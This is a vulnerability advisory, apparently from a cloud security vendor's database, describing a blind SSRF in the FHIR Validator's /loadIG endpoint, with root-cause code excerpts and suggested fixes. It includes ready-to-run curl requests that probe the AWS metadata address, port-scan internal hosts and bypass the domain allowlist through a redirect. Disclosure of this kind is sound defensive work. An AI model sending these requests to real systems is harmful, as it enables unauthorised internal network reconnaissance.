
Cloud Vulnerability DB
A community-led vulnerabilities database
The /loadIG HTTP endpoint in the FHIR Validator HTTP service accepts a user-supplied URL via JSON body and makes server-side HTTP requests to it without any hostname, scheme, or domain validation. An unauthenticated attacker with network access to the validator can probe internal network services, cloud metadata endpoints, and map network topology through error-based information leakage. With explore=true (the default for this code path), each request triggers multiple outbound HTTP calls, amplifying reconnaissance capability.
Root cause chain:
LoadIGHTTPHandler.handle() reads the ig field from user-supplied JSON and passes it directly to IgLoader.loadIg() with no validation:// LoadIGHTTPHandler.java:35,43
String ig = wrapper.asString("ig");
engine.getIgLoader().loadIg(engine.getIgs(), engine.getBinaries(), ig, false);loadIg() calls loadIgSource(srcPackage, recursive, true) with explore=true (IgLoader.java:153).loadIgSource() checks Common.isNetworkPath(src) which only verifies the URL starts with http: or https: — no host/IP validation (Common.java:14-16).ManagedWebAccess.get() which calls inAllowedPaths(). This check is a no-op by default because allowedDomains is initialized as an empty list, and the code explicitly returns true when empty:// ManagedWebAccess.java:104-106
static boolean inAllowedPaths(String pathname) {
if (allowedDomains.isEmpty()) {
return true; // DEFAULT: all domains allowed
}
// ...
}The source code has a //TODO get this from fhir settings comment (line 82) confirming this is an incomplete security control.
5. SimpleHTTPClient.get() makes the HTTP request and follows 301/302/307/308 redirects up to 5 times. Redirect targets are NOT re-validated against inAllowedPaths():
// SimpleHTTPClient.java:88-99
case HttpURLConnection.HTTP_MOVED_PERM,
HttpURLConnection.HTTP_MOVED_TEMP,
307, 308:
String location = connection.getHeaderField("Location");
url = new URL(originalUrl, location); // No domain re-validation
continue;server = HttpServer.create(new InetSocketAddress(port), 0);// LoadIGHTTPHandler.java:49
sendOperationOutcome(exchange, 500,
OperationOutcomeUtilities.createError("Failed to load IG: " + e.getMessage()), ...);Redirect bypass: Even if allowedDomains were configured, the domain check in ManagedWebAccessor.setupSimpleHTTPClient() (line 31) only validates the initial URL. An attacker can host a redirect on an allowed domain that points to an internal target.
java -jar validator_cli.jar -server -port 8080curl -X POST http://<validator-host>:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "http://169.254.169.254/latest/meta-data/"}'Expected: The validator makes a GET request to the AWS metadata service from its own network position. The error response reveals whether the endpoint is reachable (e.g., connection refused vs. parse error on HTML content). 3. Port scan an internal host:
# Open port — returns quickly with a parse error (content received but not valid FHIR)
curl -X POST http://<validator-host>:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "http://10.0.0.1:8080/"}'
# Closed port — returns with "Connection refused"
curl -X POST http://<validator-host>:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "http://10.0.0.1:9999/"}'
# Attacker hosts redirect: http://allowed-domain.com/redir → http://127.0.0.1:8080/admin
curl -X POST http://<validator-host>:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "http://allowed-domain.com/redir"}'The validator follows the redirect to the internal target without re-checking the domain allowlist.
An unauthenticated attacker with network access to the FHIR Validator HTTP service can:
/loadIG call with explore=true generates multiple outbound requests (package.tgz, JSON, XML variants)This is a blind SSRF — the fetched content is not directly returned. Impact is limited to network probing and error-based information leakage rather than full content exfiltration.LoadIGHTTPHandler before passing to loadIg() — reject private/internal IP ranges and non-standard ports:// LoadIGHTTPHandler.java — add before line 43
if (Common.isNetworkPath(ig)) {
URL url = new URL(ig);
InetAddress addr = InetAddress.getByName(url.getHost());
if (addr.isLoopbackAddress() || addr.isLinkLocalAddress() ||
addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
sendOperationOutcome(exchange, 400,
OperationOutcomeUtilities.createError("URL targets a private/internal address"),
getAcceptHeader(exchange));
return;
}
}SimpleHTTPClient.get() — check inAllowedPaths() for each redirect URL:// SimpleHTTPClient.java — inside the redirect case (after line 98)
url = new URL(originalUrl, location);
if (!ManagedWebAccess.inAllowedPaths(url.toString())) {
throw new IOException("Redirect target '" + url + "' is not in allowed domains");
}allowedDomains by default to restrict outbound requests to known FHIR registries (e.g., packages.fhir.org, hl7.org), or require explicit opt-in for open access./loadIG.Source: NVD
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."